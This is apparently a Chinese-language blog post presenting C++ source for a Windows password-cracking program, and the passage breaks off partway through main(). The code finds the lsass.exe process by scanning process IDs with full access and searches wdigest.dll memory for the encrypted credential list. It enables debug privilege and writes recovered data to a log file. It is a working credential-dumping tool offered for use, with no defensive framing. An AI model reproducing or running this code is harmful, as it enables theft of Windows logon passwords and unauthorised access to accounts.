用c++编写破解Windows密码程序(缺点只能破解当前电脑的密码)
.cpp文件
#include "CrackWinPassword.h"
#pragma warning(disable:4996)
#pragma warning(disable:4703)
HANDLE GetProcessHandleByName(const CHAR* szName)
{
//
// GetProcessHandle获得lsass.exe进程句柄
//
DWORD ReturnLength, nBytes;
WCHAR Buffer[MAX_PATH + 0x20];
//PWCHAR pRetStr;
pNTQUERYPROCESSINFORMATION NtQueryInformationProcess;
CHAR szCurrentPath[MAX_PATH];
//获取函数地址
NtQueryInformationProcess = (pNTQUERYPROCESSINFORMATION)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryInformationProcess");
// Process ID 一定是 4 的倍数
DWORD dwProcessId;//进程ID
HANDLE hProcess;//进程句柄
for (dwProcessId = 4; dwProcessId < 10 * 1000; dwProcessId += 4)
{
//打开一个进程
hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessId);
if (hProcess != NULL)
{
//将指定类型的进程信息拷贝到某个缓冲
if (!NtQueryInformationProcess(hProcess, 27, Buffer, sizeof(Buffer), &ReturnLength))
{
//pRetStr = (PWCHAR)(*(DWORD *)((DWORD)Buffer + 4));
/*
"bd6\\Device\\HarddiskVolume1\\Windows\\System32\\smss.exe"
"\\Device\\HarddiskVolume1\\Windows\\System32\\smss.exe"
*/
//去除前面4个字符
PWCHAR pszPath = (PWCHAR)((char*)Buffer + 8);
//将宽字符转换为多字节
nBytes = WideCharToMultiByte(CP_ACP, 0, pszPath, -1, szCurrentPath, MAX_PATH, NULL, NULL);
if (nBytes)
{
PCHAR pCurName = &szCurrentPath[nBytes - 1];
while (pCurName >= szCurrentPath)
{
if (*pCurName == '\\')
break;
pCurName--;
}
pCurName++;
if (lstrcmpi(szName, pCurName) == 0)
{
return hProcess;
}
}
}
// 关闭打开的句柄
CloseHandle(hProcess);
}
}
return NULL;
}
//
//根据密文关键指针特征码 KeyPointerSign[]获得密文存储的关键相关地址
//
LPVOID GetEncryptListHead()
{
//LPVOID pEndAddr, KeyPointer, pTemp;
//加载wdigest.dll模块,获取模块地址也就是模块基地址
HINSTANCE hModWdigest = LoadLibrary("wdigest.dll");
//获取函数SpInstanceInit地址 也就是结束地址
LPVOID pEndAddr = GetProcAddress(hModWdigest, "SpInstanceInit");
//当前指针 将模块基地址赋值给他
LPVOID pTemp = hModWdigest;
LPVOID KeyPointer = NULL;
while (pTemp < pEndAddr && pTemp != NULL)
{
KeyPointer = pTemp;
pTemp = (LPVOID)SearchBytes(
(PBYTE)pTemp + sizeof(KeyPointerSign), //起始地址
(PBYTE)pEndAddr, //结束地址
KeyPointerSign, //查找数据
sizeof(KeyPointerSign)); //查找大小
}
KeyPointer = (LPVOID)(*(DWORD*)((DWORD)KeyPointer - 4));
//释放模块
FreeLibrary(hModWdigest);
return KeyPointer;
}
void k8writeTxt(char* logtext)
{
//写入txt
FILE* pFile = NULL;
pFile = fopen("syspass.log", "a+");
// 12345/n5678/n 用sizeof 结果竟然只得到 1234
//fwrite( ptext2, sizeof(ptext2), 1, pFile );
fwrite(logtext, strlen(logtext), 1, pFile);
fclose(pFile); //关闭时会写入结束符
}
int main()
{
//DWORD LogonSessionCount, i, dwBytesRead;
//PLUID LogonSessionList, pCurLUID, pListLUID;
BYTE EncryptBuf[0x200];
//调节进程权限
if (FALSE == EnableDebugPrivilege())
{
printf("调整进程权限失败.错误代码:%d\n", GetLastError